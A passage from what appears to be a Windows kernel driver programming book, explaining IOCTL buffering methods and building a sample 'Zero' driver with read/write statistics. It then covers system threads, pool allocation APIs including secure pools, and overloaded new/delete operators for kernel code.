– In this case, the pointer to the user’s input buffer is store in the current I/O stack location’s
Paramaters.DeviceIoControl.Type3InputBuffer field, and the output buffer is
stored in the IRP’s UserBuffer field.
• METHOD_BUFFERED - this value indicates Buffered I/O for both the input and output buffer. When
the request starts, the I/O manager allocates the system buffer from non-paged pool with the
size that is the maximum of the lengths of the input and output buffers. It then copies the input
buffer to the system buffer. Only now the IRP_MJ_DEVICE_CONTROL dispatch routine is invoked.
When the request completes, the I/O manager copies the number of bytes indicated with the
IoStatus.Information field in the IRP to the user’s output buffer.
Chapter 7: The I/O Request Packet
211
– The system buffer pointer is at the usual location: AssociatedIrp.SystemBuffer inside
the IRP structure.
• METHOD_IN_DIRECT and METHOD_OUT_DIRECT - contrary to intuition, both of these values mean
the same thing as far as buffering methods are concerned: the input buffer uses Buffered I/O and the
output buffer uses Direct I/O. The only difference between these two values is whether the output
buffer can be read (METHOD_IN_DIRECT) or written (METHOD_OUT_DIRECT).
The last bullet indicates that the output buffer can also be treated as input by using METHOD_-
IN_DIRECT.
Table 7-1 summarizes these buffering methods.
Table 7-1: Buffering method based on control code Method parameter
Method
Input buffer
Output buffer
METHOD_NEITHER
Neither
Neither
METHOD_BUFFERED
Buffered
Buffered
METHOD_IN_DIRECT
Buffered
Direct
METHOD_OUT_DIRECT
Buffered
Direct
Finally, the Access parameter to the macro indicates the direction of data flow. FILE_WRITE_ACCESS
means from the client to the driver, FILE_READ_ACCESS means the opposite, and FILE_ANY_ACCESS
means bi-directional access (the input and output buffers are used). You shoudl always use FILE_ANY_-
ACCESS. Beside simplifying the control code building, you guarantee that if later on, once the driver
is already deployed, you may want to use the other buffer, you wouldn’t need to change the Access
parameter, and so not disturb existing clients that would not know about the control code change.
If a control code is built with METHOD_NEITHER, the I/O manager does nothing to help with
accessing the buffer(s). The values for the input and output buffer pointers provided by the
client are copied as-is to the IRP. No checking is done by the I/O manager to make sure these
pointers point to valid memory. A driver should not use these pointers as memory pointers, but
they can be used as two arbitrary values propagating to the driver that may mean something.
Putting it All Together: The Zero Driver
In this section, we’ll use what we’ve learned in this (and earlier) chapter and build a driver and a client
application. The driver is named Zero and has the following characteristics:
• For read requests, it zeros out the provided buffer.
• For write requests, it just consumes the provided buffer, similar to a classic null device.
Chapter 7: The I/O Request Packet
212
The driver will use Direct I/O so as not to incur the overhead of copies, as the buffers provided by the
client can potentially be very large.
We’ll start the project by creating an “Empty WDM Project” in Visual Studio and and name it Zero. Then
we’ll delete the created INF file, resulting in an empty project, just like in previous examples.
Using a Precompiled Header
One technique that we can use that is not specific to driver development, but is generally useful, is using
a precompiled header. Precompiled headers is a Visual Studio feature that helps with faster compilation
times. The precompiled header is a header file that has #include statements for headers that rarely
change, such as ntddk.h for drivers. The precompiled header is compiled once, stored in an internal
binary format, and used in subsequent compilations, which become considerably faster.
Many user mode projects created by Visual Studio already use precompiled headers. Kernel-
mode projects provided by the WDK templates currently don’t use precompiled headers. Since
we’re starting with an empty project, we have to set up precompiled headers manually anyway.
Follow these steps to create and use a precompiled header:
• Add a new header file to the project and call it pch.h. This file will serve as the precompiled header.
Add all rarely-changing #includes here:
// pch.h
#pragma once
#include <ntddk.h>
• Add a source file named pch.cpp and put a single #include in it: the precompiled header itself:
#include "pch.h"
• Now comes the tricky part. Letting the compiler know that pch.h is the precompiled header and
pch.cpp is the one creating it. Open project properties, select All Configurations and All Platforms
so you won’t need to configure every configuraion/platform separately, navigate to C/C++ /
Precompiled Headers and set Precompiled Header to Use and the file name to “pch.h” (see figure
7-10). Click OK and to close the dialog box.
Chapter 7: The I/O Request Packet
213
Figure 7-10: Setting precompiled header for the project
• The pch.cpp file should be set as the creator of the precompiled header. Right click this file in Solution
Explorer, and select Properties. Navigate to C/C++ / Precompiled Headers and set Precompiled Header
to Create (see figure 7-11). Click OK to accept the setting.
Chapter 7: The I/O Request Packet
214
Figure 7-10: Setting precompiled header for pch.cpp
From this point on, every C/CPP file in the project must #include "pch.h" as the first thing in the file.
Without this include, the project will not compile.
Make sure there is nothing before this #include "pch.h" in a source file. Anything before
this line does not get compiled at all!
The DriverEntry Routine
The DriveEntry routine for the Zero driver is very similar to the one we created for the driver in chapter
4. However, in chapter 4’s driver the code in DriverEntry had to undo any operation that was already done
in case of a later error. We had just two operations that could be undone: creation of the device object and
creation of the symbolic link. The Zero driver is similar, but we’ll create a more robust and less error-prone
code to handle errors during initialization. Let’s start with the basics of setting up an unload routine and
the dispatch routines:
Chapter 7: The I/O Request Packet
215
#define DRIVER_PREFIX "Zero: "
// DriverEntry
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(RegistryPath);
DriverObject->DriverUnload = ZeroUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] = ZeroCreateClose;
DriverObject->MajorFunction[IRP_MJ_READ] = ZeroRead;
DriverObject->MajorFunction[IRP_MJ_WRITE] = ZeroWrite;
Now we need to create the device object and symbolic link and handle errors in a more general and robust
way. The trick we’ll use is a do / while(false) block, which is not really a loop, but it allows getting
out of the block with a simple break statement in case something goes wrong:
UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\Zero");
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\Zero");
PDEVICE_OBJECT DeviceObject = nullptr;
auto status = STATUS_SUCCESS;
do {
status = IoCreateDevice(DriverObject, 0, &devName, FILE_DEVICE_UNKNOWN,
0, FALSE, &DeviceObject);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "failed to create device (0x%08X)\n", status));
break;
}
// set up Direct I/O
DeviceObject->Flags |= DO_DIRECT_IO;
status = IoCreateSymbolicLink(&symLink, &devName);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "failed to create symbolic link (0x%08X)\n",
status));
break;
}
} while (false);
if (!NT_SUCCESS(status)) {
Chapter 7: The I/O Request Packet
216
if (DeviceObject)
IoDeleteDevice(DeviceObject);
}
return status;
The pattern is simple: if an error occurs in any call, just break out of the “loop”. Outside the loop, check
the status, and if it’s a failure, undo any operations done so far. With this scheme in hand, it’s easy to add
more initializations (which we’ll need in more complex drivers), while keeping the cleanup code localized
and appearing just once.
It’s possible to use goto statements instead of the do / while(false) approach, but as the great
Dijkstra wrote, “goto considered harmful”, so I tend to avoid it if I can.
Notice we’re also initializing the device to use Direct I/O for our read and write operations.
The Create and Close Dispatch Routines
Before we get to the actual implementation of IRP_MJ_CREATE and IRP_MJ_CLOSE (pointing to the
same function), let’s create a helper function that simplifies completing an IRP with a given status and
information:
NTSTATUS CompleteIrp(PIRP Irp,
NTSTATUS status = STATUS_SUCCESS,
ULONG_PTR info = 0) {
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = info;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
Notice the default values for the status and information. The Create/Close dispatch routine implementation
becomes almost trivial:
NTSTATUS ZeroCreateClose(PDEVICE_OBJECT, PIRP Irp) {
return CompleteIrp(Irp);
}
The Read Dispatch Routine
The Read routine is the most interesting. First we need to check the length of the buffer to make sure it’s
not zero. If it is, just complete the IRP with a failure status:
Chapter 7: The I/O Request Packet
217
NTSTATUS ZeroRead(PDEVICE_OBJECT, PIRP Irp) {
auto stack = IoGetCurrentIrpStackLocation(Irp);
auto len = stack->Parameters.Read.Length;
if (len == 0)
return CompleteIrp(Irp, STATUS_INVALID_BUFFER_SIZE);
Note that the length of the user’s buffer is provided through the Parameters.Read member inside the
current I/O stack location.
We have configured Direct I/O, so we need to map the locked buffer to system space using MmGetSys-
temAddressForMdlSafe:
NT_ASSERT(Irp->MdlAddress);
// make sure Direct I/O flag was set
auto buffer = MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
if (!buffer)
return CompleteIrp(Irp, STATUS_INSUFFICIENT_RESOURCES);
The functionality we need to implement is to zero out the given buffer. We can use a simple memset call
to fill the buffer with zeros and then complete the request:
memset(buffer, 0, len);
return CompleteIrp(Irp, STATUS_SUCCESS, len);
}
If you prefer a more “fancy” function to zero out memory, call RtlZeroMemory. It’s a macro, defined
in terms of memset.
It’s important to set the Information field to the length of the buffer. This indicates to the client the
number of bytes transferred in the operation (returned in the second to last parameter to ReadFile). This
is all we need for the read operation.
The Write Dispatch Routine
The write dispatch routine is even simpler. All it needs to do is complete the request with the buffer length
provided by the client (essentially swallowing the buffer):
Chapter 7: The I/O Request Packet
218
NTSTATUS ZeroWrite(PDEVICE_OBJECT, PIRP Irp) {
auto stack = IoGetCurrentIrpStackLocation(Irp);
auto len = stack->Parameters.Write.Length;
return CompleteIrp(Irp, STATUS_SUCCESS, len);
}
Note that we don’t even bother calling MmGetSystemAddressForMdlSafe, as we don’t need to access
the actual buffer. This is also the reason this call is not made beforehand by the I/O manager: the driver
may not even need it, or perhaps need it in certain conditions only; so the I/O manager prepares everything
(the MDL) and lets the driver decide when and if to map the buffer.
Test Application
We’ll add a new console application project to the solution to test the read and write operations.
Here is some simple code to test these operations:
int Error(const char* msg) {
printf("%s: error=%u\n", msg, ::GetLastError());
return 1;
}
int main() {
HANDLE hDevice = CreateFile(L"\\\\.\\Zero", GENERIC_READ | GENERIC_WRITE,
0, nullptr, OPEN_EXISTING, 0, nullptr);
if (hDevice == INVALID_HANDLE_VALUE) {
return Error("Failed to open device");
}
// test read
BYTE buffer[64];
// store some non-zero data
for (int i = 0; i < sizeof(buffer); ++i)
buffer[i] = i + 1;
DWORD bytes;
BOOL ok = ReadFile(hDevice, buffer, sizeof(buffer), &bytes, nullptr);
if (!ok)
return Error("failed to read");
if (bytes != sizeof(buffer))
printf("Wrong number of bytes\n");
Chapter 7: The I/O Request Packet
219
// check that all bytes are zero
for (auto n : buffer)
if (n != 0) {
printf("Wrong data!\n");
break;
}
// test write
BYTE buffer2[1024];
// contains junk
ok = WriteFile(hDevice, buffer2, sizeof(buffer2), &bytes, nullptr);
if (!ok)
return Error("failed to write");
if (bytes != sizeof(buffer2))
printf("Wrong byte count\n");
CloseHandle(hDevice);
}
Read/Write Statistics
Let’s add some more functionality to the Zero driver. We may want to count the total bytes read/written
throughout the lifetime of the driver. A user-mode client should be able to read these statistics, and perhaps
even zero them out.
We’ll start by defining two global variables to keep track of the total number of bytes read/written (in
Zero.cpp):
long long g_TotalRead;
long long g_TotalWritten;
You could certainly put these in a structure for easier maintenance and extension. The long long C++
type is a signed 64-bit value. You can add unsigned if you wish, or use a typedef such as LONG64 or
ULONG64, which would mean the same thing. Since these are global variables, they are zeroed out by
default.
We’ll create a new file that contains information common to user-mode clients and the driver called
ZeroCommon.h. here is where we define the control codes we support, as well as data structures to be
shared with user-mode.
First, we’ll add two control codes: one for getting the stats and another for clearing them:
Chapter 7: The I/O Request Packet
220
#define DEVICE_ZERO 0x8022
#define IOCTL_ZERO_GET_STATS
\
CTL_CODE(DEVICE_ZERO, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_ZERO_CLEAR_STATS \
CTL_CODE(DEVICE_ZERO, 0x801, METHOD_NEITHER, FILE_ANY_ACCESS)
The DEVICE_ZERO is defined as some number from 0x8000 as the documentation recommends. The
function number starts with 0x800 and incremented with each control code. METHOD_BUFFERED is used
for getting the stats, as the size of the returned data is small (2 x 8 bytes). Clearing the stats requires no
buffers, so METHOD_NEITHER is selected.
Next, we’ll add a structure that can be used by clients (and the driver) for storing the stats:
struct ZeroStats {
long long TotalRead;
long long TotalWritten;
};
In DriverEntry, we add a dispatch routine for IRP_MJ_DEVICE_CONTROL like so:
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ZeroDeviceControl;
All the work is done in ZeroDeviceControl. First, some initialization:
NTSTATUS ZeroDeviceControl(PDEVICE_OBJECT, PIRP Irp) {
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
auto& dic = irpSp->Parameters.DeviceIoControl;
auto status = STATUS_INVALID_DEVICE_REQUEST;
ULONG_PTR len = 0;
The details for IRP_MJ_DEVICE_CONTROL are located in the current I/O stack location in the Parame-
ters.DeviceIoControl structure. The status is initialized to an error in case the control code provided
is unsupported. len keeps track of the number of valid bytes returned in the output buffer.
Implementing the IOCTL_ZERO_GET_STATS is done in the usual way. First, check for errors. If all goes
well, the stats are written to the output buffer:
Chapter 7: The I/O Request Packet
221
switch (dic.IoControlCode) {
case IOCTL_ZERO_GET_STATS:
{
// artificial scope so the compiler doesn not complain
// about defining variables skipped by a case
if (dic.OutputBufferLength < sizeof(ZeroStats)) {
status = STATUS_BUFFER_TOO_SMALL;
break;
}
auto stats = (ZeroStats*)Irp->AssociatedIrp.SystemBuffer;
if (stats == nullptr) {
status = STATUS_INVALID_PARAMETER;
break;
}
//
// fiil in the output buffer
//
stats->TotalRead = g_TotalRead;
stats->TotalWritten = g_TotalWritten;
len = sizeof(ZeroStats);
break;
}
Once out of the switch, the IRP would be completed. Here is the stats clearing Ioctl handling:
case IOCTL_ZERO_CLEAR_STATS:
g_TotalRead = g_TotalWritten = 0;
break;
}
All that’s left to do is complete the IRP with whatever status and length values are:
return CompleteIrp(Irp, status, len);
For easier viewing, here is the complete IRP_MJ_DEVICE_CONTROL handling:
Chapter 7: The I/O Request Packet
222
NTSTATUS ZeroDeviceControl(PDEVICE_OBJECT, PIRP Irp) {
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
auto& dic = irpSp->Parameters.DeviceIoControl;
auto status = STATUS_INVALID_DEVICE_REQUEST;
ULONG_PTR len = 0;
switch (dic.IoControlCode) {
case IOCTL_ZERO_GET_STATS:
{
if (dic.OutputBufferLength < sizeof(ZeroStats)) {
status = STATUS_BUFFER_TOO_SMALL;
break;
}
auto stats = (ZeroStats*)Irp->AssociatedIrp.SystemBuffer;
if (stats == nullptr) {
status = STATUS_INVALID_PARAMETER;
break;
}
stats->TotalRead = g_TotalRead;
stats->TotalWritten = g_TotalWritten;
len = sizeof(ZeroStats);
break;
}
case IOCTL_ZERO_CLEAR_STATS:
g_TotalRead = g_TotalWritten = 0;
break;
}
return CompleteIrp(Irp, status, len);
}
The stats have to be updated when data is read/written. It must be done in a thread safe way, as multiple
clients may bombard the driver with read/write requests. Here is the updates ZeroWrite function:
Chapter 7: The I/O Request Packet
223
NTSTATUS ZeroWrite(PDEVICE_OBJECT, PIRP Irp) {
auto stack = IoGetCurrentIrpStackLocation(Irp);
auto len = stack->Parameters.Write.Length;
// update the number of bytes written
InterlockedAdd64(&g_TotalWritten, len);
return CompleteIrp(Irp, STATUS_SUCCESS, len);
}
The change to ZeroRead is very similar.
Astute readers may question the safety of the Ioctl implementations. For example, is reading the total
number of bytes read/written with no multithreaded protection (while possible read/write operations
are in effect) a correct operation, or is it a data race? Technically, it’s a data race, as the driver might be
updating to the stats globals while some client is reading the values, that could result in torn reads. One
way to resolve that is by dispensing with the interlocked instructions and use a mutex or a fast mutex to
protect access to these variables. Alternatively, There are functions to deal with these scenario, such as
ReadAcquire64. Their implementation is CPU dependent. For x86/x64, they are actually normal reads,
as the processor provides safety against such torn reads. On ARM CPUs, this requires a memory barrier
to be inserted (memory barriers are beyond the scope of this book).
Save the number of bytes read/written to the Registry before the driver unloads. Read it back
when the driver loads.
Replace the Interlocked instructions with a fast mutex to protect access to the stats.
Here is some client code to retrieve these stats:
ZeroStats stats;
if (!DeviceIoControl(hDevice, IOCTL_ZERO_GET_STATS,
nullptr, 0, &stats, sizeof(stats), &bytes, nullptr))
return Error("failed in DeviceIoControl");
printf("Total Read: %lld, Total Write: %lld\n",
stats.TotalRead, stats.TotalWritten);
Summary
In this chapter, we learned how to handle IRPs, which drivers deal with all the time. Armed with this
knowledge, we can start leveraging more kernel functionality, starting with process and thread callbacks
in chapter 9. Before getting to that, however, there are more techniques and kernel APIs that may be useful
for a driver developer, described in the next chapter.
Chapter 8: Advanced Programming
Techniques (Part 1)
In this chapter we’ll examine various techniques of various degrees of usefulness to driver developers.
In this chapter:
• Driver Created Threads
• Memory Management
• Calling Other Drivers
• Putting it All Together: The Melody Driver
• Invoking System Services
Driver Created Threads
We’ve seen how to create work items in chapter 6. Work items are useful when some code needs to execute
on a separate thread, and that code is “bound” in time - that is, it’s not too long, so that the driver doesn’t
“steal” a thread from the kernel worker threads. For long operations, however, it’s preferable that drivers
create their own seperate thread(s). Two functions are available for this purpose:
NTSTATUS PsCreateSystemThread(
_Out_ PHANDLE ThreadHandle,
_In_
ULONG DesiredAccess,
_In_opt_
POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_
HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext);
NTSTATUS IoCreateSystemThread(
// Win 8 and later
_Inout_ PVOID IoObject,
_Out_ PHANDLE ThreadHandle,
_In_
ULONG DesiredAccess,
_In_opt_
POBJECT_ATTRIBUTES ObjectAttributes,
Chapter 8: Advanced Programming Techniques (Part 1)
225
_In_opt_
HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext);
Both functions have the same set of parameters except the additional first parameter to IoCreateSys-
temThread. The latter function takes an additional reference on the object passed in (which must be
a device object or a driver object), so the driver is not unloaded prematurely while the thread is alive.
IoCreateSystemThread is only available for Windows 8 and later systems. Here is a description of the
other parameters:
• ThreadHandle is the address of a handle to the created thread if successful. The driver must use
ZwClose to close the handle at some point.
• DesiredAccess is the access mask requested. Drivers should simply use THREAD_ALL_ACCESS
to get all possible access with the resulting handle.
• ObjectAttributes is the standard OBJECT_ATTRIBUTES structure. Most members have no
meaning for a thread. The most common attributes to request of the returned handle is OBJ_KER-
NEL_HANDLE, but it’s not needed if the thread is to be created in the System process - just pass
NULL, which will always return a kernel handle.
• ProcessHandle is a handle to the process where this thread should be created. Drivers should
pass NULL to indicate the thread should be part of the System process so it’s not tied to any specific
process’ lifetime.
• ClientId is an optional output structure, providing the process and thread ID of the newly created
thread. In most cases, this information is not needed, and NULL can be specified.
• StartRoutine is the function to execute in a separate thread of execution. This function must
have the following prototype:
VOID KSTART_ROUTINE (_In_ PVOID StartContext);
The StartContext value is provided by the last parameter to Ps/IoCreateSystemThread. This could
be anything (or NULL) that would give the new thread data to work with.
The function indicated by StartRoutine will start execution on a separate thread. It’s executed with
the IRQL being PASSIVE_LEVEL (0) in a critical region (where normal kernel APCs are disabled).
For PsCreateSystemThread, exiting the thread function is not enough to terminate the thread. An
explicit call to PsTerminateSystemThread is required to properly manage the thread’s lifetime:
NTSTATUS PsTerminateSystemThread(_In_ NTSTATUS ExitStatus);
The exit status is the exit code of the thread, which can be retrieved with PsGetThreadExitStatus if
desired.
For IoCreateSystemThread, exiting the thread function is sufficient, as PsTerminateSystemThread
is called on its behalf when the thread function returns. The exit code of the thread is always STATUS_-
SUCCESS.
Chapter 8: Advanced Programming Techniques (Part 1)
226
IoCreateSystemThread is a wrapper around PsCreateSystemThread that increments
the ref count of the passed in device/driver object, calls PsCreateSystemThread and then
decrements the ref count and calls PsTerminateSystemThread.
Memory Management
We have looked at the most common functions for dynamic memory allocation in chapter 3. The most
useful is ExAllocatePoolWithTag, which we have used multiple times in previous chapters. There are
other functions for dynamic memory allocation you might find useful. Then, we’ll examine lookaside lists,
that allow more efficient memory management if fixed-size chunks are needed.
Pool Allocations
In addition to ExAllocatePoolWithTag, the Executive provides an extended version that indicates the
importance of an allocation, taken into account in low memory conditions:
typedef enum _EX_POOL_PRIORITY {
LowPoolPriority,
LowPoolPrioritySpecialPoolOverrun = 8,
LowPoolPrioritySpecialPoolUnderrun = 9,
NormalPoolPriority = 16,
NormalPoolPrioritySpecialPoolOverrun = 24,
NormalPoolPrioritySpecialPoolUnderrun = 25,
HighPoolPriority = 32,
HighPoolPrioritySpecialPoolOverrun = 40,
HighPoolPrioritySpecialPoolUnderrun = 41
} EX_POOL_PRIORITY;
PVOID ExAllocatePoolWithTagPriority (
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag,
_In_ EX_POOL_PRIORITY Priority);
The priority-related values indicate the importance of succeeding an allocation if system memory is low
(LowPoolPriority), very low (NormalPoolPriority), or completely out of memory (HighPoolPriority).
In any case, the driver should be prepared to handle a failure.
The “special pool” values tell the Executive to make the allocation at the end of a page (“Overrun” values)
or beginning of a page (“Underrun”) values, so it’s easier to catch buffer overflow or underflow. These
values should only be used while tracking memory corruptions, as each allocation costs at least one page.
Starting with Windows 10 version 1909 (and Windows 11), two new pool allocation functions are supported.
The first is ExAllocatePool2 declared like so:
Chapter 8: Advanced Programming Techniques (Part 1)
227
PVOID ExAllocatePool2 (
_In_ POOL_FLAGS Flags,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag);
Where the POOL_FLAGS enumeration consists of a combination of values shown in table 8-1:
Table 8-1: Flags for ExAllocatePool2
Flag (POOL_FLAG_)
Must recognize?
Description
USE_QUOTA
Yes
Charge allocation to calling process
UNINITIALIZED
Yes
Contents of allocated memory is not touched. Without this
flag, the memory is zeroed out
CACHE_ALIGNED
Yes
Address should be CPU-cache aligned. This is “best effort”
RAISE_ON_FAILURE
Yes
Raises an exception (STATUS_INSUFFICIENT_RESOURCES)
instead of returning NULL if allocation fails
NON_PAGED
Yes
Allocate from non-paged pool. The memory is executable on
x86, and non-executable on all other platforms
PAGED
Yes
Allocate from paged pool. The memory is executable on x86,
and non-executable on all other platforms
NON_PAGED_EXECUTABLE
Yes
Non paged pool with execute permissions
SPECIAL_POOL
No
Allocates from “special” pool (separate from the normal pool
so it’s easier to find memory corruptions)
The Must recognize? column indicates whether failure to recognize or satisfy the flag causes the function
to fail.
The second allocation function, ExAllocatePool3, is extensible, so new functions of this sort are
unlikely to pop up in the future:
PVOID ExAllocatePool3 (
_In_ POOL_FLAGS Flags,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag,
_In_reads_opt_(ExtendedParametersCount)
PCPOOL_EXTENDED_PARAMETER ExtendedParameters,
_In_ ULONG ExtendedParametersCount);
This function allows customization with an array of “parameters”, where the supported parameter types
may be extended in future kernel versions. The currently available parameters are defined with the POOL_-
EXTENDED_PARAMETER_TYPE enumeration:
Chapter 8: Advanced Programming Techniques (Part 1)
228
typedef enum POOL_EXTENDED_PARAMETER_TYPE {
PoolExtendedParameterInvalidType = 0,
PoolExtendedParameterPriority,
PoolExtendedParameterSecurePool,
PoolExtendedParameterNumaNode,
PoolExtendedParameterMax
} POOL_EXTENDED_PARAMETER_TYPE, *PPOOL_EXTENDED_PARAMETER_TYPE;
The array provided to ExAllocatePool3 consists of structures of type POOL_EXTENDED_PARAMETER,
each one specifying one parameter:
typedef struct _POOL_EXTENDED_PARAMETER {
struct {
ULONG64 Type : 8;
ULONG64 Optional : 1;
ULONG64 Reserved : 64 - 9;
};
union {
ULONG64 Reserved2;
PVOID Reserved3;
EX_POOL_PRIORITY Priority;
POOL_EXTENDED_PARAMS_SECURE_POOL* SecurePoolParams;
POOL_NODE_REQUIREMENT PreferredNode;
// ULONG
};
} POOL_EXTENDED_PARAMETER, *PPOOL_EXTENDED_PARAMETER;
The Type member indicates which of the union members is valid for this parameter (POOL_EXTENDED_-
PARAMETER_TYPE). Optional indicates if the parameter set is optional or required. An optional
parameter that fails to be satisfied does not cause the ExAllocatePool3 to fail. Based on Type, the
correct member in the union must be set. Currently, these parameters are available:
• Priority of the allocation (Priority member)
• Preferred NUMA node (PreferredNode member)
• Use secure pool (discussed later, SecurePoolParams member)
The following example shows using ExAllocatePool3 to achieve the same effect as ExAllocatePool-
WithTagPriority for non-paged memory:
Chapter 8: Advanced Programming Techniques (Part 1)
229
PVOID AllocNonPagedPriority(ULONG size, ULONG tag, EX_POOL_PRIORITY priority) {
POOL_EXTENDED_PARAMETER param;
param.Optional = FALSE;
param.Type = PoolExtendedParameterPriority;
param.Priority = priority;
return ExAllocatePool3(POOL_FLAG_NON_PAGED, size, tag, ¶m, 1);
}
Secure Pools
Secure pools introduced in Windows 10 version 1909 allow kernel callers to have a memory pool that
cannot be accessed by other kernel components. This kind of protection is internally achieved by the
Hyper-V hypervisor, leveraging its power to protect memory access even from the kernel, as the memory
is part of Virtual Trust Level (VTL) 1 (the secure world). Currently, secure pools are not fully documented,
but here are the basic steps to use a secure pool.
Secure pools are only available if Virtualization Based Security (VBS) is active (meaning Hyper-
V exists and creates the two worlds - normal and secure). Discussion of VBS is beyond the scope
of this book. Consult information online (or the Windows Internals books) for more on VBS.
A secure pool can be created with ExCreatePool, returning a handle to the pool:
#define POOL_CREATE_FLG_SECURE_POOL
0x1
#define POOL_CREATE_FLG_USE_GLOBAL_POOL 0x2
#define POOL_CREATE_FLG_VALID_FLAGS (POOL_CREATE_FLG_SECURE_POOL | \
POOL_CREATE_FLG_USE_GLOBAL_POOL)
NTSTATUS ExCreatePool (
_In_ ULONG Flags,
_In_ ULONG_PTR Tag,
_In_opt_ POOL_CREATE_EXTENDED_PARAMS* Params,
_Out_ HANDLE* PoolHandle);
Currently, flags should be POOL_CREATE_FLG_VALID_FLAGS (both supported flags), and Params
should be NULL. PoolHandle contains the pool handle if the call succeeds.
Allocating from a secure pool must be done with ExAllocatePool3, described in the previous section
with a POOL_EXTENDED_PARAMS_SECURE_POOL structure as a parameter:
Chapter 8: Advanced Programming Techniques (Part 1)
230
#define SECURE_POOL_FLAGS_NONE
0x0
#define SECURE_POOL_FLAGS_FREEABLE
0x1
#define SECURE_POOL_FLAGS_MODIFIABLE 0x2
typedef struct _POOL_EXTENDED_PARAMS_SECURE_POOL {
HANDLE SecurePoolHandle;
// pool handle
PVOID Buffer;
// initial data
ULONG_PTR Cookie;
// for validation
ULONG SecurePoolFlags;
// flags above
} POOL_EXTENDED_PARAMS_SECURE_POOL;
Buffer points to existing data to be initially stored in the new allocation. Cookie is used for validation,
by calling ExSecurePoolValidate. Freeing memory from a secure pool must be done with a new
function, ExFreePool2:
VOID ExFreePool2 (
_Pre_notnull_ PVOID P,
_In_ ULONG Tag,
_In_reads_opt_(ExtendedParametersCount)
PCPOOL_EXTENDED_PARAMETER ExtendedParameters,
_In_ ULONG ExtendedParametersCount);
If ExtendedParameters is NULL (and ExtendedParametersCount is zero), the call is diverted to
the normal ExFreePool, which will fail for a secure pool. For a secure pool, a single POOL_EXTENDED_-
PARAMETER is required that has the pool parameters with the pool handle onlt. Buffer should be NULL.
Finally, a secure pool must be destroyed with ExDestroyPool:
VOID ExDestroyPool (_In_ HANDLE PoolHandle);
Overloading the new and delete Operators
We know there is no C++ runtime in the kernel, which means some C++ features that work as expected in
user mode don’t work in kernel mode. One of these features are the new and delete C++ operators.
Although we can use the dynamic memory allocation functions, new and delete have a couple of
advantages over calling the raw functions:
• new causes a constructor to be invoked, and delete causes the destructor to be invoked.
• new accepts a type for which memory must be allocated, rather than specifying a number of bytes.
Fortunately, C++ allows overloading the new and delete operators, either globally or for secific types.
new can be overloaded with extra parameters that are needed for kernel allocations - at least the pool type
must be specified. The first argument to any overloaded new is the number of bytes to allocate, and any
extra parameters can be added after that. These are specified with paranthesis when actually used. The
compiler inserts a call to the appropriate constructor, if exists.
Here is a basic implementation of an overloaded new operator that calls ExAllocatePoolWithTag:
Chapter 8: Advanced Programming Techniques (Part 1)
231
void* __cdecl operator new(size_t size, POOL_TYPE pool, ULONG tag) {
return ExAllocatePoolWithTag(pool, size, tag);
}
The __cdecl modifier indicates this should be using the C calling convention (rather than the __stdcall
convention). It only matters in x86 builds, but still should be specified as shown.
Here is an example usage, assuming an object of type MyData needs to be allocated from paged pool:
MyData* data = new (PagedPool, DRIVER_TAG) MyData;
if(data == nullptr)
return STATUS_INSUFFICIENT_RESOURCES;
// do work with data
The size parameter is never specified explicitly as the compiler inserts the correct size (which is essentially
sizeof(MyData) in the above example). All other parameters must be specified. We can make the
overload simpler to use if we default the tag to a macro such as DRIVER_TAG, expected to exist:
void* __cdecl operator new(size_t size, POOL_TYPE pool,
ULONG tag = DRIVER_TAG) {
return ExAllocatePoolWithTag(pool, size, tag);
}
And the corresponding usage is simpler:
MyData* data = new (PagedPool) MyData;
In the above examples, the default constructor is invoked, but it’s perfectly valid to invoke any other
constructor that exists for the type. For example:
struct MyData {
MyData(ULONG someValue);
// details not shown
};
auto data = new (PagedPool) MyData(200);
We can easily extend the overloading idea to other overloads, such as one that wraps ExAllocatePool-
WithTagPriority:
Chapter 8: Advanced Programming Techniques (Part 1)
232
void* __cdecl operator new(size_t size, POOL_TYPE pool,
EX_POOL_PRIORITY priority, ULONG tag = DRIVER_TAG) {
return ExAllocatePoolWithTagPriority(pool, size, tag, priority);
}
Using the above operator is just a matter of adding a priority in parenthesis:
auto data = new (PagedPool, LowPoolPriority) MyData(200);
Another common case is where you already have an allocated block of memory to store some object
(perhaps allocated by a function out of your control), but you still want to initialize the object by invoking
a constructor. Another new overload can be used for this purpose, known as placement new, since it does
not allocate anything, but the compiler still adds a call to a constructor. Here is how to define a placement
new operator overload:
void* __cdecl operator new(size_t size, void* p) {
return p;
}
And an example usage:
void* SomeFunctionAllocatingObject();
MyData* data = (MyData*)SomeFunctionAllocatingObject();
new (data) MyData;
Finally, an overload for delete is required so the memory can be freed at some point, calling the destructor
if it exists. Here is how to overload the delete operator:
void __cdecl operator delete(void* p, size_t) {
ExFreePool(p);
}
The extra size parameter is not used in practice (zero is always the value provided), but the compiler
requires it.
Chapter 8: Advanced Programming Techniques (Part 1)
233
Remember that you cannot have global objects that have default constructors that do some-
thing, since there is no runtime to invoke them. The compiler will report a warning if you
try. A way around it (of sorts) is to declare the global variable as a pointer, and then use an
overloaded new to allocate and invoke a constructor in DriverEntry. of course, you must
